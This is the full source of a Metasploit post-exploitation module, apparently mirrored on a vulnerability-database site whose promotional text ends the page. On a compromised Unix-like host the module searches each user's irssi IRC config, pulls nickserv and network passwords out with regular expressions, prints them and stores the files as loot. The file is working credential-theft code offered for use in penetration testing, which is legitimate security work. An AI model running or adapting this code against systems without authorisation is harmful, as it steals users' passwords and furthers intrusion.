##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Post
include Msf::Post::File
include Msf::Post::Unix
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Multi Gather IRSSI IRC Password(s)',
'Description' => %q{
This module grabs IRSSI IRC credentials.
},
'Author' => [
'Jonathan Claudius <jclaudius[at]mozilla.com>',
],
'Platform' => %w[bsd linux osx unix],
'SessionTypes' => %w[shell],
'License' => MSF_LICENSE
)
)
end
def run
print_status('Finding ~/.irssi/config')
paths = enum_user_directories.map { |d| d + '/.irssi/config' }
paths = paths.select { |f| file?(f) }
if paths.empty?
print_error('No users found with a ~/.irssi/config file')
return
end
download_passwords(paths)
end
# Example of what we're looking for in the config...
#
# ***Identify Password Example***
# autosendcmd = "/msg nickserv identify example_password ;wait 2000";
#
# ***Network Password Example***
# password = "example_password";
#
def contains_passwords?(path)
data = read_file(path)
identify_passwords = data.scan(%r{/\^?msg nickserv identify ([^\s]+)})
network_passwords = data.scan(/^?password = "([^\s]+)"/)
passwords = identify_passwords.flatten + network_passwords.flatten
if passwords.any?
print_good("Found IRC password(s) of #{passwords.join(',')} in irssi config at #{path}")
return true
end
false
end
def download_passwords(paths)
print_status "Looting #{paths.count} files"
paths.each do |path|
path.chomp!
next if ['.', '..'].include?(path)
next unless contains_passwords?(path)
loot_path = store_loot(
'irssi config file',
'text/plain',
session,
read_file(path),
path,
'IRC Password'
)
print_good("irssi config with passwords stored in #{loot_path}")
end
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation